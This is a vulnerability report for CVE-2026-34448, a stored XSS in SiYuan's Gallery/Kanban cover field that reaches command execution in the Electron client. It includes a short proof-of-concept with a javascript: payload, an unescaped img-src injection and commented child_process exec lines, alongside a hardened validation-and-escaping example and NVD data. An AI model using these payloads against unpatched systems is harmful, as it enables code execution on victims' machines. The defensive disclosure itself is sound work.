Security Vulnerability Report
CVE-2026-34448 CVSS 9.0 CRITICAL

CVE-2026-34448

Published: 2026-03-31 22:16:20
Last Modified: 2026-04-03 16:58:41

Description

SiYuan is a personal knowledge management system. Prior to version 3.6.2, an attacker who can place a malicious URL in an Attribute View mAsse field can trigger stored XSS when a victim opens the Gallery or Kanban view with “Cover From -> Asset Field” enabled. The vulnerable code accepts arbitrary http(s) URLs without extensions as images, stores the attacker-controlled string in coverURL, and injects it directly into an <img src="..."> attribute without escaping. In the Electron desktop client, the injected JavaScript executes with nodeIntegration enabled and contextIsolation disabled, so the XSS reaches arbitrary OS command execution under the victim’s account. This issue has been patched in version 3.6.2.

CVSS Details

CVSS Score
9.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:b3log:siyuan:*:*:*:*:*:*:*:* - VULNERABLE
SiYuan Note < 3.6.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
JavaScript
// Payload to be injected into the 'Attribute View Asset Field'
// The application treats this input as an image URL and injects it into an <img> tag.
// Example payload using javascript protocol (if not strictly filtered to http/https):
var malicious_payload = "javascript:alert('CVE-2026-34448-XSS');";

// Alternatively, if the application fetches the URL and renders it,
// an attacker might host a malicious file that triggers execution.

// Simulation of the vulnerable code behavior:
var coverURL = malicious_payload; // Data from database
var vulnerable_html = '<img src="' + coverURL + '">'; // Direct injection without escaping
// console.log(vulnerable_html);
// Output: <img src="javascript:alert('CVE-2026-34448-XSS');">

// In the Electron desktop client context, this can be escalated to RCE:
// var node_require = require('child_process');
// node_require.exec('calc.exe');
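The description and the PoC above both come down to the stored cover string being concatenated into an <img src> attribute without validation or escaping. As an added example (not SiYuan's code and not the 3.6.2 patch), the vulnerable pattern is shown beside a hardened version that parses the URL, accepts only http(s) URLs or relative asset paths ending in an image extension (an assumed allow-list), and HTML-escapes the attribute value; function names and sample inputs are constructed for illustration.

```javascript
// Added example, not SiYuan's code or its 3.6.2 patch. Function names and the
// extension allow-list below are assumptions for illustration.
const IMAGE_EXT = /\.(png|jpe?g|gif|webp|svg|bmp|avif)$/i;

// Vulnerable pattern from the advisory: the stored string is concatenated
// straight into the attribute value, so quotes and brackets are honoured.
function renderCoverVulnerable(coverURL) {
  return '<img src="' + coverURL + '">';
}

// HTML attribute escaping: each character that could close the quoted
// attribute or open a new tag becomes an entity.
function escapeAttr(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Returns a normalised URL if it is an acceptable cover image, else null.
// Scheme is checked via the URL parser (so "javascript:" is rejected by
// protocol, not by substring matching) and the path must end in an image
// extension; a relative "assets/" path is allowed under the same rule.
function validateCoverURL(coverURL) {
  const s = String(coverURL).trim();
  if (s.startsWith('assets/')) {
    return IMAGE_EXT.test(s) && !/[\s"'<>]/.test(s) ? s : null;
  }
  let u;
  try { u = new URL(s); } catch { return null; }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') return null;
  if (!IMAGE_EXT.test(u.pathname)) return null;
  return u.href;
}

// Hardened rendering: validate first, then escape; anything rejected gets a
// neutral fallback instead of reaching the DOM.
function renderCoverHardened(coverURL) {
  const safe = validateCoverURL(coverURL);
  if (safe === null) return '<img src="" alt="cover unavailable">';
  return '<img src="' + escapeAttr(safe) + '">';
}

// Constructed sample inputs (not taken from the advisory).
const SAMPLES = {
  good: 'https://example.com/covers/cover.png',
  noExt: 'https://example.com/cover',
  scheme: "javascript:alert('x')",
  breakout: 'https://example.com/a.png"><b>x</b>',
  query: 'https://example.com/a.png?w=1&h=2',
};
```

Validation alone is not a substitute for escaping: the query sample passes the allow-list yet still needs its & encoded, which is why the hardened path does both. In the Electron client the same advisory notes nodeIntegration enabled and contextIsolation disabled, which is the setting that turns a markup injection into command execution, so those renderer flags are a separate mitigation layer from this rendering fix.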

References

https://github.com/siyuan-note/siyuan/issues/17246 (Issue Tracking)
https://github.com/siyuan-note/siyuan/releases/tag/v3.6.2 (Release Notes)
https://github.com/siyuan-note/siyuan/security/advisories/GHSA-rx4h-526q-4458 (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-34448",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-31T22:16:19.657",
    "lastModified": "2026-04-03T16:58:40.760",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "SiYuan is a personal knowledge management system. Prior to version 3.6.2, an attacker who can place a malicious URL in an Attribute View mAsse field can trigger stored XSS when a victim opens the Gallery or Kanban view with “Cover From -> Asset Field” enabled. The vulnerable code accepts arbitrary http(s) URLs without extensions as images, stores the attacker-controlled string in coverURL, and injects it directly into an <img src=\"...\"> attribute without escaping. In the Electron desktop client, the injected JavaScript executes with nodeIntegration enabled and contextIsolation disabled, so the XSS reaches arbitrary OS command execution under the victim’s account. This issue has been patched in version 3.6.2."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
            "baseScore": 9.0,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 6.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-79"},
          {"lang": "en", "value": "CWE-94"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:b3log:siyuan:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "3.6.2",
                "matchCriteriaId": "27CB71A7-7208-417A-AE6D-266D57F683E9"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/siyuan-note/siyuan/issues/17246", "source": "[email protected]", "tags": ["Issue Tracking"]},
      {"url": "https://github.com/siyuan-note/siyuan/releases/tag/v3.6.2", "source": "[email protected]", "tags": ["Release Notes"]},
      {"url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-rx4h-526q-4458", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}
    ]
  }
}